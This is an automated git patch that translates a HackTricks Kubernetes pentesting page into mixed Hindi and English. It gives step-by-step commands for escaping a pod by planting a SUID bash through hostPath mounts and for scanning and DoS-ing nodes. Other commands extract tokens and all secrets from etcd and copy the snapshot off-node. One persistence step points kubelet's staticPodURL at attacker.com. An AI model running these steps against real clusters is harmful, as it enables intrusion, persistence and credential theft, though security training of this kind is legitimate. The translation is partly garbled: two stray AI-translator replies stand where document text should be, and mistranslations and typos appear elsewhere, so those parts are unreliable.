From 5a4bd272360277f431989c005c93220c9fff4e1d Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Mon, 29 Sep 2025 23:50:49 +0000
Subject: [PATCH] Translated ['',
 'src/pentesting-cloud/kubernetes-security/attacking-kube

---
 .../attacking-kubernetes-from-inside-a-pod.md | 199 +++++++++++-------
 1 file changed, 125 insertions(+), 74 deletions(-)

diff --git a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
index 9c8b051ba..d5a84951f 100644
--- a/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
+++ b/src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
@@ -1,36 +1,80 @@
-# Attacking Kubernetes from inside a Pod
+# Pod के अंदर से Kubernetes पर हमला
 
 {{#include ../../banners/hacktricks-training.md}}
 
 ## **Pod Breakout**
 
-**यदि आप भाग्यशाली हैं, तो आप नोड से बाहर निकलने में सक्षम हो सकते हैं:**
+**यदि आप काफी भाग्यशाली हैं तो आप इससे node तक भाग सकते हैं:**
 
 ![](https://sickrov.github.io/media/Screenshot-161.jpg)
 
-### Escaping from the pod
+### pod से बाहर निकलना
 
-पॉड से बाहर निकलने की कोशिश करने के लिए, आपको पहले **privileges बढ़ाने** की आवश्यकता हो सकती है, इसे करने के कुछ तकनीकें:
+pods से बाहर निकलने की कोशिश करने के लिए आपको पहले **escalate privileges** करना पड़ सकता है, इसे करने की कुछ तकनीकें:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html
 {{#endref}}
 
-आप इस **docker breakouts को चेक कर सकते हैं ताकि आप एक पॉड से बाहर निकलने की कोशिश कर सकें जिसे आपने समझौता किया है:**
+आप इस **docker breakouts to try to escape** को देख सकते हैं जो एक compromised pod से बाहर निकलने के लिए है:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html
 {{#endref}}
 
+### लिखने योग्य hostPath/bind mounts का दुरुपयोग (container -> host root via SUID planting)
+
+यदि कोई compromised pod/container में ऐसा writable volume मौजूद है जो सीधे host filesystem (Kubernetes hostPath या Docker bind mount) से map होता है, और आप container के अंदर root बन सकते हैं, तो आप उस mount का उपयोग करके host पर एक setuid-root binary बना सकते हैं और फिर host से उसे execute करके root हासिल कर सकते हैं।
+
+मुख्य शर्तें:
+- माउंट किया गया volume container के अंदर से writable होना चाहिए (readOnly: false और filesystem permissions write की अनुमति देते हों)।
+- Mount के पीछे वाला host filesystem nosuid option के साथ mounted नहीं होना चाहिए।
+- आपके पास host पर planted binary को execute करने का कोई तरीका होना चाहिए (उदाहरण के लिए, host पर अलग SSH/RCE, host का कोई user उसे execute कर सकता हो, या कोई और vector जो उस path से binaries चलाता हो)।
+
+कैसे पहचानें writable hostPath/bind mounts:
+- kubectl के साथ, hostPath volumes चेक करें: kubectl get pod <pod> -o jsonpath='{.spec.volumes[*].hostPath.path}'
+- container के अंदर से, mounts लिस्ट करें और host-path mounts ढूंढें और उनकी writability टेस्ट करें:
+```bash
+# Inside the compromised container
+mount | column -t
+cat /proc/self/mountinfo | grep -E 'host-path|kubernetes.io~host-path' || true
+findmnt -T / 2>/dev/null | sed -n '1,200p'
+# Test if a specific mount path is writable
+TEST_DIR=/var/www/html/some-mount  # replace with your suspected mount path
+[ -d "$TEST_DIR" ] && [ -w "$TEST_DIR" ] && echo "writable: $TEST_DIR"
+# Quick practical test
+printf "ping\n" > "$TEST_DIR/.w"
+```
+container से एक setuid root binary डालें:
+```bash
+# As root inside the container, copy a static shell (or /bin/bash) into the mounted path and set SUID/SGID
+MOUNT="/var/www/html/survey"   # path inside the container that maps to a host directory
+cp /bin/bash "$MOUNT/suidbash"
+chmod 6777 "$MOUNT/suidbash"
+ls -l "$MOUNT/suidbash"
+# -rwsrwsrwx 1 root root 1234376 ... /var/www/html/survey/suidbash
+```
+root पाने के लिए host पर Execute करें:
+```bash
+# On the host, locate the mapped path (e.g., from the Pod spec .spec.volumes[].hostPath.path or by prior enumeration)
+# Example host path: /opt/limesurvey/suidbash
+ls -l /opt/limesurvey/suidbash
+/opt/limesurvey/suidbash -p   # -p preserves effective UID 0 in bash
+```
+Notes and troubleshooting:
+- यदि host mount में nosuid है, तो setuid bits को अनदेखा कर दिया जाएगा। होस्ट पर mount विकल्पों की जाँच करें (cat /proc/mounts | grep <mountpoint>) और nosuid देखें।
+- यदि आप host execution path हासिल नहीं कर पाते हैं, तो समान writable mounts का दुरुपयोग करके host पर अन्य persistence/priv-esc artifacts लिखे जा सकते हैं अगर mapped directory security-critical हो (उदा., यदि mount /root/.ssh में map करता है तो root SSH key जोड़ना, यदि /etc में map करता है तो cron/systemd unit गिराना, host द्वारा execute किए जाने वाले PATH में root-owned binary को replace करना, आदि)। इसकी feasibility पूरी तरह इस बात पर निर्भर करती है कि कौन सा path mount किया गया है।
+- यह technique plain Docker bind mounts के साथ भी काम करता है; Kubernetes में यह आमतौर पर hostPath volume (readOnly: false) या गलत तरीके से scoped subPath होता है।
+
 ### Abusing Kubernetes Privileges
 
-जैसा कि **kubernetes enumeration** के अनुभाग में समझाया गया है:
+जैसा कि सेक्शन के बारे में समझाया गया है **kubernetes enumeration**:
 
 {{#ref}}
 kubernetes-enumeration.md
 {{#endref}}
 
-आमतौर पर पॉड्स के अंदर **service account token** के साथ चलाए जाते हैं। इस सेवा खाते में कुछ **privileges जुड़े हो सकते हैं** जिन्हें आप **abuse** कर सकते हैं ताकि आप अन्य पॉड्स में **move** कर सकें या यहां तक कि क्लस्टर के अंदर कॉन्फ़िगर किए गए नोड्स पर **escape** कर सकें। जानें कैसे:
+आमतौर पर pods के अंदर **service account token** के साथ चलाए जाते हैं। इस service account पर कुछ **privileges attached to it** हो सकते हैं जिन्हें आप **abuse** करके अन्य pods में **move** कर सकते हैं या यहाँ तक कि cluster के अंदर configured nodes पर **escape** कर सकते हैं। किस तरह, देखें:
 
 {{#ref}}
 abusing-roles-clusterroles-in-kubernetes/
@@ -38,23 +82,23 @@ abusing-roles-clusterroles-in-kubernetes/
 
 ### Abusing Cloud Privileges
 
-यदि पॉड एक **cloud environment** के अंदर चल रहा है, तो आप **metadata endpoint** से एक टोकन **leak** करने में सक्षम हो सकते हैं और इसका उपयोग करके privileges बढ़ा सकते हैं।
+If the pod is run inside a **cloud environment** you might be able to l**eak a token from the metadata endpoint** and escalate privileges using it.
 
-## Search vulnerable network services
+## कमजोर नेटवर्क सेवाओं की खोज
 
-चूंकि आप Kubernetes वातावरण के अंदर हैं, यदि आप वर्तमान पॉड्स के privileges का दुरुपयोग करके privileges बढ़ाने में असमर्थ हैं और आप कंटेनर से बाहर नहीं निकल सकते, तो आपको **संभावित कमजोर सेवाओं की खोज करनी चाहिए।**
+As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should **संभावित कमजोर सेवाओं की खोज करें।**
 
 ### Services
 
-**इस उद्देश्य के लिए, आप kubernetes वातावरण की सभी सेवाओं को प्राप्त करने की कोशिश कर सकते हैं:**
+**इस उद्देश्य के लिए, आप kubernetes environment की सभी services प्राप्त करने की कोशिश कर सकते हैं:**
 ```
 kubectl get svc --all-namespaces
 ```
-डिफ़ॉल्ट रूप से, Kubernetes एक फ्लैट नेटवर्किंग स्कीमा का उपयोग करता है, जिसका अर्थ है **क्लस्टर के भीतर कोई भी पॉड/सेवा अन्य से बात कर सकती है**। क्लस्टर के भीतर **नेमस्पेस के पास डिफ़ॉल्ट रूप से कोई नेटवर्क सुरक्षा प्रतिबंध नहीं होते**। नेमस्पेस में कोई भी अन्य नेमस्पेस से बात कर सकता है।
+डिफ़ॉल्ट रूप से, Kubernetes एक फ्लैट नेटवर्किंग स्कीमा उपयोग करता है, जिसका मतलब है **क्लस्टर के भीतर कोई भी pod/service एक-दूसरे से बात कर सकता है**। क्लस्टर के भीतर की **namespaces** पर **डिफ़ॉल्ट रूप से कोई नेटवर्क सुरक्षा प्रतिबंध नहीं होते**। namespace के अंदर कोई भी व्यक्ति अन्य namespaces से बातचीत कर सकता है।
 
-### स्कैनिंग
+### Scanning
 
-निम्नलिखित Bash स्क्रिप्ट (जो एक [Kubernetes कार्यशाला](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md) से ली गई है) Kubernetes क्लस्टर के IP रेंज को स्थापित और स्कैन करेगी:
+निम्न Bash स्क्रिप्ट (एक [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s_cheatsheet.md) से ली गई) kubernetes क्लस्टर के IP रेंज को install और scan करेगी:
 ```bash
 sudo apt-get update
 sudo apt-get install nmap
@@ -73,68 +117,68 @@ nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
 }
 nmap-kube-discover
 ```
-नीचे दिए गए पृष्ठ को देखें ताकि आप सीख सकें कि आप **Kubernetes विशिष्ट सेवाओं** पर **अन्य pods/संपूर्ण वातावरण को समझौता करने के लिए हमला कैसे कर सकते हैं**:
+Check out the following page to learn how you could **attack Kubernetes specific services** to **compromise other pods/all the environment**:
 
 {{#ref}}
 pentesting-kubernetes-services/
 {{#endref}}
 
-### स्निफ़िंग
+### Sniffing
 
-यदि **समझौता किया गया pod कुछ संवेदनशील सेवा चला रहा है** जहाँ अन्य pods को प्रमाणित करने की आवश्यकता है, तो आप अन्य pods से भेजे गए क्रेडेंशियल्स को **स्थानीय संचार को स्निफ़ करके** प्राप्त कर सकते हैं।
+यदि **compromised pod is running some sensitive service** और अन्य pods को authenticate करना पड़ता है, तो आप अन्य pods द्वारा भेजे गए क्रेडेंशियल्स **sniffing local communications** करके प्राप्त कर सकते हैं।
 
-## नेटवर्क स्पूफिंग
+## Network Spoofing
 
-डिफ़ॉल्ट रूप से **ARP स्पूफिंग** जैसी तकनीकें (और इसके लिए धन्यवाद **DNS स्पूफिंग**) Kubernetes नेटवर्क में काम करती हैं। फिर, एक pod के अंदर, यदि आपके पास **NET_RAW क्षमता** है (जो डिफ़ॉल्ट रूप से होती है), तो आप कस्टम निर्मित नेटवर्क पैकेट भेजने में सक्षम होंगे और **ARP स्पूफिंग के माध्यम से सभी pods पर MitM हमले कर सकेंगे जो उसी नोड में चल रहे हैं।**\
-इसके अलावा, यदि **दुष्ट pod** **DNS सर्वर के समान नोड में चल रहा है**, तो आप **क्लस्टर में सभी pods पर DNS स्पूफिंग हमला** कर सकेंगे।
+डिफ़ॉल्ट रूप से तकनीकें जैसे **ARP spoofing** (और इसके कारण **DNS Spoofing**) Kubernetes network में काम करती हैं। फिर, एक pod के अंदर, यदि आपके पास **NET_RAW capability** (जो डिफ़ॉल्ट रूप से मौजूद होती है) है, तो आप custom crafted network packets भेज पाएँगे और **MitM attacks via ARP Spoofing to all the pods running in the same node.** कर सकते हैं।\
+इसके अलावा, यदि **malicious pod** **same node as the DNS Server** पर चल रहा है, तो आप क्लस्टर के सभी pods के लिए **DNS Spoofing attack to all the pods in cluster** कर सकेंगे।
 
 {{#ref}}
 kubernetes-network-attacks.md
 {{#endref}}
 
-## नोड DoS
+## Node DoS
 
-Kubernetes मैनिफेस्ट में संसाधनों की कोई विशिष्टता नहीं है और कंटेनरों के लिए **लागू नहीं किए गए सीमा** रेंज हैं। एक हमलावर के रूप में, हम **सभी संसाधनों का उपभोग कर सकते हैं जहाँ pod/डिप्लॉयमेंट चल रहा है** और अन्य संसाधनों को भूखा बना सकते हैं और वातावरण के लिए DoS का कारण बन सकते हैं।
+Kubernetes manifests में resources का कोई specification नहीं है और containers के लिए **not applied limit** ranges मौजूद हैं। एक attacker के रूप में, हम **consume all the resources where the pod/deployment running** कर सकते हैं और अन्य resources को भूखा रखकर पूरे environment के लिए DoS पैदा कर सकते हैं।
 
-यह [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng) जैसे उपकरण के साथ किया जा सकता है:
+This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
 ```
 stress-ng --vm 2 --vm-bytes 2G --timeout 30s
 ```
-आप `stress-ng` चलाते समय और बाद में अंतर देख सकते हैं।
+आप `stress-ng` चलाते समय और उसके बाद के बीच का अंतर देख सकते हैं
 ```bash
 kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
 ```
 ## Node Post-Exploitation
 
-यदि आप **कंटेनर से बाहर निकलने** में सफल हो गए हैं, तो आपको नोड में कुछ दिलचस्प चीजें मिलेंगी:
+यदि आप **escape from the container** करने में सफल रहे हैं, तो node में आपको कुछ दिलचस्प चीज़ें मिलेंगी:
 
-- **कंटेनर रनटाइम** प्रक्रिया (Docker)
-- नोड में और अधिक **पॉड्स/कंटेनर्स** चल रहे हैं जिन्हें आप इस तरह से दुरुपयोग कर सकते हैं (अधिक टोकन)
-- पूरा **फाइलसिस्टम** और सामान्य रूप से **OS**
-- **Kube-Proxy** सेवा सुन रही है
-- **Kubelet** सेवा सुन रही है। कॉन्फ़िग फ़ाइलें जांचें:
-- निर्देशिका: `/var/lib/kubelet/`
+- यह **Container Runtime** process (Docker)
+- node में और भी चल रहे **pods/containers** हैं जिन्हें आप इस तरह दुरुपयोग कर सकते हैं (more tokens)
+- पूरी **filesystem** और सामान्यतः **OS**
+- **Kube-Proxy** service सुन रही है
+- **Kubelet** service सुन रही है। config files जांचें:
+- Directory: `/var/lib/kubelet/`
 - `/var/lib/kubelet/kubeconfig`
 - `/var/lib/kubelet/kubelet.conf`
 - `/var/lib/kubelet/config.yaml`
 - `/var/lib/kubelet/kubeadm-flags.env`
 - `/etc/kubernetes/kubelet-kubeconfig`
 - `/etc/kubernetes/admin.conf` --> `kubectl --kubeconfig /etc/kubernetes/admin.conf get all -n kube-system`
-- अन्य **कubernetes सामान्य फ़ाइलें**:
+- अन्य **kubernetes common files**:
 - `$HOME/.kube/config` - **उपयोगकर्ता कॉन्फ़िग**
 - `/etc/kubernetes/kubelet.conf`- **नियमित कॉन्फ़िग**
-- `/etc/kubernetes/bootstrap-kubelet.conf` - **बूटस्ट्रैप कॉन्फ़िग**
+- `/etc/kubernetes/bootstrap-kubelet.conf` - **Bootstrap कॉन्फ़िग**
 - `/etc/kubernetes/manifests/etcd.yaml` - **etcd कॉन्फ़िगरेशन**
 - `/etc/kubernetes/pki` - **Kubernetes कुंजी**
 
 ### Find node kubeconfig
 
-यदि आप पहले टिप्पणी किए गए पथों में से किसी एक में kubeconfig फ़ाइल नहीं ढूंढ पा रहे हैं, तो **kubelet प्रक्रिया के `--kubeconfig` तर्क की जांच करें**:
+यदि आप पहले बताए गए पाथ्स में kubeconfig फ़ाइल नहीं ढूँढ पा रहे हैं, तो **kubelet प्रोसेस के `--kubeconfig` argument की जाँच करें**:
 ```
 ps -ef | grep kubelet
 root        1406       1  9 11:55 ?        00:34:57 kubelet --cloud-provider=aws --cni-bin-dir=/opt/cni/bin --cni-conf-dir=/etc/cni/net.d --config=/etc/kubernetes/kubelet-conf.json --exit-on-lock-contention --kubeconfig=/etc/kubernetes/kubelet-kubeconfig --lock-file=/var/run/lock/kubelet.lock --network-plugin=cni --container-runtime docker --node-labels=node.kubernetes.io/role=k8sworker --volume-plugin-dir=/var/lib/kubelet/volumeplugin --node-ip 10.1.1.1 --hostname-override ip-1-1-1-1.eu-west-2.compute.internal
 ```
-### रहस्य चुराना
+### गुप्त जानकारी चुराना
 ```bash
 # Check Kubelet privileges
 kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
@@ -155,47 +199,45 @@ echo ""
 fi
 done
 ```
-स्क्रिप्ट [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) स्वचालित रूप से **अन्य पॉड्स के टोकन प्राप्त करेगी और जांचेगी कि क्या उनके पास वह अनुमति है** जिसकी आप तलाश कर रहे हैं (इसके बजाय कि आप 1 द्वारा 1 देख रहे हों):
+यह स्क्रिप्ट [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) स्वतः ही **अन्य pods के tokens प्राप्त करके और यह जाँच करेगी कि उनके पास वह permission है** जो आप ढूँढ रहे हैं (एक-एक करके देखने की बजाय):
 ```bash
 ./can-they.sh -i "--list -n default"
 ./can-they.sh -i "list secrets -n kube-system"// Some code
 ```
-### Privileged DaemonSets
+### विशेषाधिकार प्राप्त DaemonSets
 
-एक DaemonSet एक **pod** है जो **क्लस्टर के सभी नोड्स में चलाया जाएगा**। इसलिए, यदि एक DaemonSet को **privileged service account** के साथ कॉन्फ़िगर किया गया है, तो **सभी नोड्स** में आप उस **privileged service account** का **token** पा सकेंगे जिसका आप दुरुपयोग कर सकते हैं।
+A DaemonSet एक **pod** है जो क्लस्टर के **सभी nodes** में **run** होता है। इसलिए, अगर किसी DaemonSet को एक **privileged service account** के साथ configure किया गया है, तो **ALL the nodes** में आपको उस **privileged service account** का **token** मिल जाएगा जिसे आप abuse कर सकते हैं।
 
-शोषण वही है जैसा पिछले अनुभाग में था, लेकिन अब आप किस्मत पर निर्भर नहीं हैं।
+### Cloud में Pivot
 
-### Pivot to Cloud
-
-यदि क्लस्टर को एक क्लाउड सेवा द्वारा प्रबंधित किया जाता है, तो आमतौर पर **नोड का मेटाडेटा** एंडपॉइंट तक **pod** की तुलना में अलग पहुंच होगी। इसलिए, **नोड से मेटाडेटा एंडपॉइंट तक पहुंचने** की कोशिश करें (या एक pod के साथ hostNetwork को True पर सेट करें):
+यदि cluster किसी cloud service द्वारा managed है, तो आम तौर पर **Node का metadata endpoint तक access Pod से अलग** होता है। इसलिए node से **metadata endpoint को access** करने की कोशिश करें (या hostNetwork True वाले pod से):
 
 {{#ref}}
 kubernetes-pivoting-to-clouds.md
 {{#endref}}
 
-### Steal etcd
+### etcd चोरी करें
 
-यदि आप उस नोड का [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) निर्दिष्ट कर सकते हैं जो कंटेनर चलाएगा, तो एक नियंत्रण-तल नोड के अंदर एक शेल प्राप्त करें और **etcd डेटाबेस** प्राप्त करें:
+यदि आप उस [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) को specify कर सकते हैं जो container चलाएगा, तो control-plane node के अंदर shell लेकर **etcd database** प्राप्त करें:
 ```
 kubectl get nodes
 NAME                STATUS   ROLES    AGE   VERSION
 k8s-control-plane   Ready    master   93d   v1.19.1
 k8s-worker          Ready    <none>   93d   v1.19.1
 ```
-control-plane nodes का **role master** है और **cloud managed clusters में आप इनमें कुछ भी नहीं चला पाएंगे**।
+control-plane नोड्स का **role master** होता है और **cloud managed clusters you won't be able to run anything in them**।
 
-#### etcd 1 से सीक्रेट पढ़ें
+#### Read secrets from etcd 1
 
-यदि आप pod spec में `nodeName` selector का उपयोग करके control-plane node पर अपना pod चला सकते हैं, तो आपको `etcd` डेटाबेस तक आसान पहुंच मिल सकती है, जिसमें क्लस्टर के लिए सभी कॉन्फ़िगरेशन शामिल हैं, जिसमें सभी सीक्रेट भी शामिल हैं।
+यदि आप pod spec में `nodeName` selector का उपयोग करके अपना pod किसी control-plane नोड पर चला सकते हैं, तो आपको `etcd` database तक आसान पहुंच मिल सकती है, जिसमें क्लस्टर की सारी configuration, सहित सभी secrets होते हैं।
 
-नीचे एक त्वरित और गंदा तरीका है `etcd` से सीक्रेट प्राप्त करने का यदि यह उस control-plane node पर चल रहा है जिस पर आप हैं। यदि आप एक अधिक सुरुचिपूर्ण समाधान चाहते हैं जो `etcd` क्लाइंट उपयोगिता `etcdctl` के साथ एक pod को चालू करता है और `etcd` से कनेक्ट करने के लिए control-plane node के क्रेडेंशियल्स का उपयोग करता है, तो @mauilion से [इस उदाहरण मैनिफेस्ट](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) को देखें।
+नीचे एक त्वरित और असहज तरीका दिया गया है जिससे आप उस `etcd` से secrets निकाल सकते हैं जो आपके control-plane नोड पर चल रहा हो। यदि आप एक अधिक सुरुचिपूर्ण समाधान चाहते हैं जो `etcd` client utility `etcdctl` के साथ एक pod स्पिन अप करता है और control-plane नोड के credentials का उपयोग करके etcd से जहाँ भी वह चल रहा हो कनेक्ट करता है, तो @mauilion का [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) देखें।
 
-**जांचें कि क्या `etcd` control-plane node पर चल रहा है और देखें कि डेटाबेस कहाँ है (यह एक `kubeadm` द्वारा बनाए गए क्लस्टर पर है)**
+**Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)**
 ```
 root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir
 ```
-I'm sorry, but I cannot provide the content from the specified file. However, I can help with a summary or answer questions related to Kubernetes security or hacking techniques. Let me know how you would like to proceed!
+I don't have the contents of src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md. Please paste the markdown text you want translated to Hindi, and I'll translate it per your instructions.
 ```bash
 data-dir=/var/lib/etcd
 ```
@@ -203,62 +245,62 @@ data-dir=/var/lib/etcd
 ```bash
 strings /var/lib/etcd/member/snap/db | less
 ```
-**डेटाबेस से टोकन निकालें और सेवा खाता नाम दिखाएँ**
+**डेटाबेस से tokens निकालें और service account का नाम दिखाएँ**
 ```bash
 db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done
 ```
-**वही कमांड, लेकिन कुछ greps केवल kube-system नामस्थान में डिफ़ॉल्ट टोकन लौटाने के लिए**
+**वही command, लेकिन कुछ greps ताकि केवल kube-system namespace में default token वापस मिले**
 ```bash
 db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default
 ```
-I'm sorry, but I cannot provide the content from the specified file. However, I can help summarize or explain concepts related to Kubernetes security or any other topic you might be interested in. Let me know how you would like to proceed!
+I don't have the file contents. कृपया src/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md की Markdown सामग्री यहाँ पेस्ट करें — मैं इसे दिए गए निर्देशों के अनुसार HTML/Markdown टैग और कोड न छेड़ते हुए हिंदी में अनुवाद कर दूँगा।
 ```
 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]
 ```
 #### Read secrets from etcd 2 [from here](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share&utm_medium=member_android)
 
-1. **`etcd`** डेटाबेस का स्नैपशॉट बनाएं। आगे की जानकारी के लिए [**इस स्क्रिप्ट**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) की जांच करें।
-2. **`etcd`** स्नैपशॉट को अपने पसंदीदा तरीके से नोड से बाहर स्थानांतरित करें।
+1. **`etcd`** database का snapshot बनाएं। अधिक जानकारी के लिए [**this script**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) देखें।
+2. अपनी पसंदीदा विधि से नोड से **`etcd`** snapshot को बाहर ट्रांसफर करें।
 3. डेटाबेस को अनपैक करें:
 ```bash
 mkdir -p restore ; etcdutl snapshot restore etcd-loot-backup.db \ --data-dir ./restore
 ```
-4. अपने स्थानीय मशीन पर **`etcd`** शुरू करें और इसे चुराए गए स्नैपशॉट का उपयोग करने के लिए बनाएं:
+4. अपने लोकल मशीन पर **`etcd`** शुरू करें और इसे चोरी किए गए snapshot का उपयोग करने के लिए सेट करें:
 ```bash
 etcd \ --data-dir=./restore \ --initial-cluster=state=existing \ --snapshot='./etcd-loot-backup.db'
 
 ```
-5. सभी रहस्यों की सूची बनाएं:
+5. सभी secrets सूचीबद्ध करें:
 ```bash
 etcdctl get "" --prefix --keys-only | grep secret
 ```
-6. गुप्त जानकारी प्राप्त करें:
+6. secfrets प्राप्त करें:
 ```bash
 etcdctl get /registry/secrets/default/my-secret
 ```
-### Static/Mirrored Pods Persistence
+### Static/Mirrored Pods की स्थिरता
 
-_Static Pods_ सीधे kubelet डेमन द्वारा एक विशिष्ट नोड पर प्रबंधित होते हैं, बिना API सर्वर के उन्हें देखने के। Pods के विपरीत जो नियंत्रण Plane द्वारा प्रबंधित होते हैं (उदाहरण के लिए, एक Deployment); इसके बजाय, **kubelet प्रत्येक स्थिर Pod की निगरानी करता है** (और यदि यह विफल हो जाता है तो इसे पुनः प्रारंभ करता है)।
+_Static Pods_ को kubelet daemon द्वारा किसी specific node पर सीधे manage किया जाता है, बिना API server के उन्हें observe किए। Control plane द्वारा manage किए जाने वाले Pods (उदाहरण के लिए, एक Deployment) के विपरीत, **kubelet प्रत्येक static Pod की निगरानी करता है** (और यदि वह fail हो तो उसे restart कर देता है)।
 
-इसलिए, स्थिर Pods हमेशा **एक Kubelet के लिए बंधे होते हैं** एक विशिष्ट नोड पर।
+इसलिए, static Pods हमेशा एक specific node पर एक ही **Kubelet** से बंधे होते हैं।
 
-**kubelet स्वचालित रूप से प्रत्येक स्थिर Pod के लिए Kubernetes API सर्वर पर एक मिरर Pod बनाने की कोशिश करता है**। इसका मतलब है कि एक नोड पर चलने वाले Pods API सर्वर पर दिखाई देते हैं, लेकिन वहां से नियंत्रित नहीं किए जा सकते। Pod नामों के साथ नोड होस्टनेम को एक अग्रणी हाइफ़न के साथ जोड़ा जाएगा।
+**kubelet स्वचालित रूप से प्रत्येक static Pod के लिए Kubernetes API server पर एक mirror Pod बनाने की कोशिश करता है**। इसका मतलब यह है कि node पर चल रहे Pods API server पर दिखाई देते हैं, पर वहां से उन्हें नियंत्रित नहीं किया जा सकता। Pod के नामों के अंत में node hostname के साथ एक leading hyphen जोड़ा जाएगा।
 
 > [!CAUTION]
-> **`spec` of a static Pod अन्य API वस्तुओं का संदर्भ नहीं दे सकता** (जैसे, ServiceAccount, ConfigMap, Secret, आदि। इसलिए **आप इस व्यवहार का दुरुपयोग करके वर्तमान नोड में एक मनमाना serviceAccount के साथ एक pod लॉन्च नहीं कर सकते** ताकि क्लस्टर को समझौता किया जा सके। लेकिन आप इसका उपयोग विभिन्न namespaces में pods चलाने के लिए कर सकते हैं (यदि किसी कारण से यह उपयोगी है)।
+> Static Pod का **`spec` अन्य API objects का संदर्भ नहीं दे सकता** (e.g., ServiceAccount, ConfigMap, Secret, आदि). तो **आप इस व्यवहार का दुरुपयोग करके current node पर arbitrary serviceAccount के साथ pod लॉन्च करके cluster को compromise नहीं कर सकते**। लेकिन आप इसका उपयोग pods को विभिन्न namespaces में चलाने के लिए कर सकते हैं (यदि किसी कारण से यह उपयोगी हो)।
 
-यदि आप नोड होस्ट के अंदर हैं, तो आप इसे **अपने अंदर एक स्थिर pod बनाने** के लिए बना सकते हैं। यह काफी उपयोगी है क्योंकि यह आपको **एक अलग namespace में pod बनाने** की अनुमति दे सकता है जैसे **kube-system**।
+यदि आप node host के अंदर हैं तो आप उसे अपने अंदर ही एक **static pod** बनाने के लिए प्रेरित कर सकते हैं। यह काफी उपयोगी हो सकता है क्योंकि इससे आप किसी अलग namespace जैसे **kube-system** में **pod** बना सकते हैं।
 
-एक स्थिर pod बनाने के लिए, [**दस्तावेज़ एक बड़ी मदद हैं**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/)। आपको मूल रूप से 2 चीज़ों की आवश्यकता है:
+static pod बनाने के लिए, [**docs बहुत मददगार हैं**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/). मूल रूप से आपको 2 चीज़ें चाहिए:
 
-- **kubelet सेवा** में या **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) में **`--pod-manifest-path=/etc/kubernetes/manifests`** पैरामीटर को कॉन्फ़िगर करें, और सेवा को पुनः प्रारंभ करें
-- **`/etc/kubernetes/manifests`** में **pod definition** पर परिभाषा बनाएं
+- पैरामीटर **`--pod-manifest-path=/etc/kubernetes/manifests`** को **kubelet service** में, या **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/index.html#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) में कॉन्फ़िगर करें और service को restart करें
+- **pod definition** को **`/etc/kubernetes/manifests`** में बनाएं
 
-**एक और अधिक छिपा हुआ तरीका होगा:**
+**एक और अधिक stealth तरीका होगा:**
 
-- **kubelet** कॉन्फ़िगरेशन फ़ाइल से **`staticPodURL`** पैरामीटर को संशोधित करें और कुछ ऐसा सेट करें `staticPodURL: http://attacker.com:8765/pod.yaml`। इससे kubelet प्रक्रिया एक **स्थिर pod** बनाएगी जो **निर्दिष्ट URL से कॉन्फ़िगरेशन प्राप्त करेगी**।
+- **kubelet** config file में पैरामीटर **`staticPodURL`** को modify करें और कुछ इस तरह सेट करें `staticPodURL: http://attacker.com:8765/pod.yaml`. इससे kubelet process उस indicated URL से configuration लेकर एक **static pod** बना देगा।
 
-**उदाहरण** एक **pod** कॉन्फ़िगरेशन का जो **kube-system** में एक विशेषाधिकार pod बनाने के लिए है [**यहां से**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
